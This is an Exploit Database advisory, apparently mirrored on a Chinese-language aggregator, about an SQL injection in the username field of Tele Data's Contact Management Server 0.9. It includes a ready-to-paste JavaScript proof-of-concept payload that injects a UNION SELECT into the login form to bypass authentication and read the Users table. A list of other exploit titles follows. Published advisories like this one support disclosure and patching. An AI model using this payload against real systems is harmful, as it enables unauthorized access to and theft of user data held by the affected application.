Tele Data’s Contact Management Server 0.9 – ‘Username’ SQL Injection

Exploit Database
44 阅读

作者： John Leitch

日期： 2010-04-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33909/

source: https://www.securityfocus.com/bid/39799/info

The Tele Data's Contact Management Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database

Tele Data's Contact Management Server 0.9 is vulnerable; other versions may also be affected. 

The following proof-of-concept code is available:

javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

last Exploits
Tele Data’s Contact Management Server 0.9 – ‘Username’ SQL Injection的更多信息

Openedit 5.1294 – Remote Code Execution：
WordPress Theme NexosReal Estate 1.7 – ‘search_order’ SQL Injection：
CMSimple – Cross-Site Request Forgery：
Zoom Meeting Connector 4.6.239.20200613 – Remote Root Exploit (Authenticated)：
Chyrp 2.x – ‘action’ Traversal Local File Inclusion：
Joomla! Component Jimtawl 2.2.7 – ‘id’ SQL Injection：
WordPress Plugin LearnDash LMS 3.1.2 – Reflective Cross-Site Scripting：
Douran Portal 3.9.7.55 – Arbitrary File Upload / Cross-Site Scripting：